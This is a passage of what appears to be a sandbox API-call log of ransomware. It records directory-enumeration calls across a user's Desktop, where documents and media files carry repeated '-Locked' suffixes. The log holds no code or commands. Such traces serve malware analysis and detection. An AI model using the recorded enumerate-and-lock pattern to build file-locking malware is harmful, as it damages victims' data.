cAlternateFileName="Y4HQQH~2.PDF")) returned 0 [0311.447] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.447] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.448] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.448] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392d69ca, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x392d69ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0311.448] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x393d1b6d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x393d1b6d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x393d1b6d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0311.448] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0311.449] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394f7e55, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x394f7e55, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x394f7e55, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0311.449] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39678739, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39678739, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39678739, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0311.450] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0311.450] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3981d31e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3981d31e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3981d31e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0311.450] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x398e9c82, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x398e9c82, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x398e9c82, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0311.450] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39aa04d4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39aa04d4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39aa04d4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0311.451] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ca5881, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ca5881, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ca5881, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0311.451] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cbb7f2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cbb7f2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cbb7f2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0311.451] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ccc9c8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ccc9c8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ccc9c8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0311.451] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cdef13, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cdef13, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cdef13, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0311.451] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cf2779, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cf2779, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cf2779, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0311.452] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cfaf95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39cfaf95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39cfaf95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0311.452] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d7aed7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d7aed7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d7aed7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0311.452] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d898ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d898ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d898ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0311.453] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d98288, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39d98288, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39d98288, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0311.453] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39daa824, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39daa824, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39daa824, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0311.453] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39db92a4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39db92a4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39db92a4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0311.455] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39de780f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39de780f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39de780f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0311.456] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39df7661, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39df7661, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39df7661, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0311.456] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e04d24, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e04d24, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e04d24, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0311.456] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e137ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e137ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e137ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0311.456] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e271e7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e271e7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e271e7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0311.457] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e5437b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e5437b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e5437b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0311.457] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e8f876, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39e8f876, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39e8f876, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0311.457] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ead58a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ead58a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ead58a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0311.457] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39eecde0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39eecde0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39eecde0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0311.458] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39efdef6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39efdef6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39efdef6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0311.458] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f633cd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f633cd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f633cd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0311.458] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f86a90, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f86a90, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f86a90, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0311.458] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0311.458] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.459] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.459] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.460] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f9de41, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f9de41, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9de41, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked-Locked", cAlternateFileName="EZB4HL~2.M4A")) returned 1 [0311.460] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fc0063, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fc0063, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fc0063, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked-Locked-Locked", cAlternateFileName="EKQ_ZA~2.MKV")) returned 1 [0311.460] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fcc3b1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fcc3b1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fcc3b1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked-Locked-Locked", cAlternateFileName="ITP31J~2.WAV")) returned 1 [0311.460] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fd8719, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fd8719, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fd8719, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked-Locked-Locked", cAlternateFileName="IXYBAL~1.AVI")) returned 1 [0311.461] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fe37df, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fe37df, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fe37df, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked-Locked-Locked", cAlternateFileName="SSEWKY~2.PPT")) returned 1 [0311.461] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ff0e77, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ff0e77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ff0e77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked-Locked-Locked", cAlternateFileName="UJK4SN~2.MP4")) returned 1 [0311.461] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ffe4b2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ffe4b2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ffe4b2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 1 [0311.462] 